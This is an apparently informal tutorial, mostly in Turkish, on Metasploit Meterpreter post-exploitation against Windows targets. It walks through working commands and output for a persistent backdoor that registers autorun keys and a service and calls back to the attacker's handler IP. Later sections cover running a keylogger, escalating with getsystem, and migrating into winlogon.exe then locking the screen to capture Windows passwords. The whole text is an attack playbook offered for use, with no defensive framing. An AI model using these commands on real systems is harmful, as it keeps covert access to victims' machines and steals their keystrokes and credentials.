Persistent Meterpereter Session

Önrek 1:

 // After gaining a Meterpreter shell on the target machine, upload and install
 // our persistent agent

 meterpreter > run persistence -S -i 1 -p 443 -r 192.168.1.10

 // -S creates a service on the target machine
 // -i specifies the interval in seconds between connection attemps
 // -p specifies the target port on our handler that the agent will connect to
 // -r specifies the IP address of our handler

 [*] Creating a persistent agent: LHOST=192.168.1.10 LPORT=443 (interval=1 onboot=true)
 [*] Persistent agent script is 614100 bytes long
 [*] Uploaded the persistent agent to C:\WINDOWS\TEMP\oqRUfRY.vbs
 [*] Agent executed with PID 3320
 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\FmasPLYc
 [*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\FmasPLYc
 [*] Creating service ONvoLxVurSB

  Örnek 2:
run persistence -A -L C:\\ -i 10 -p 443 -r 172.16.56.1

The -A parameter will automatically start the multi handler.Another 
option is the -L which allows us to specify the location on the target 
host that the payload will be.For our scenario we have chosen the C:\\ 
as the path in order to find the backdoor easily.The -X option is 
because we want to start the backdoor when the system 
boots.Alternatively there is the -U option.For the interval option we 
have set it to 10 sec and for the port that the backdoor will listen the
 443 which in most windows environments is open.Finally the -r option is
 for our IP address.

Meterpereter Keylogger Sorunu

Evet,bazen nedense keylogger işlemiyor bu gibi durumlarda meterpereter session ı açtıktan sonra

run keylogrecorder -c 0 komutunu çalıştırırsanız

[*]     explorer.exe Process found, migrating into 2812
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to 

C:/Users/Faruk/.msf3/logs/scripts/keylogrecorder/....txt
[*] Recording

şeklinde bir sonuç alırsınız

yada

meterpreter > getsystem
 ...got system (via technique 1).
meterpreter > run keylogrecorder -c 0 -t 15
[*]     spshell.exe Process found, migrating into 1980 

bunu deneyebilirsiniz... 

windows şifresini almak için de önce winlogon.exe processine migrate olmanız gerekiyor.

meterpreter> ps
Process list
============
 
 PID   Name                 Arch  Session  User                         
 ---   ----                 ----  -------  ----                          
 0     [System Process]
 4     System               x86   0        NT AUTHORITY\SYSTEM
 544   smss.exe             x86   0        NT AUTHORITY\SYSTEM       
 608   csrss.exe            x86   0        NT AUTHORITY\SYSTEM         
 2976   winlogon.exe         x86   0        NT AUTHORITY\SYSTEM         
meterpreter > migrate 2976
[*] Migrating to 2976...
[*] Migration completed successfully.

c - açık olan oturumlardan hangisine bağlanmak istiyorsunuz.

    0 varsayılan ilk oturumdur.

l - kişiyi logoff olmaya zorlar bu asyede beklemeden windows 

    şifresini alabilirsiniz.

t - kaç saniyede bir keyleri almasını istiyorsunuz.

meterpreter> run keylogrecorder -c 1 -l -t 5
[*] Locking Screen...
[*] Screen has been locked
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/...
[*] Recording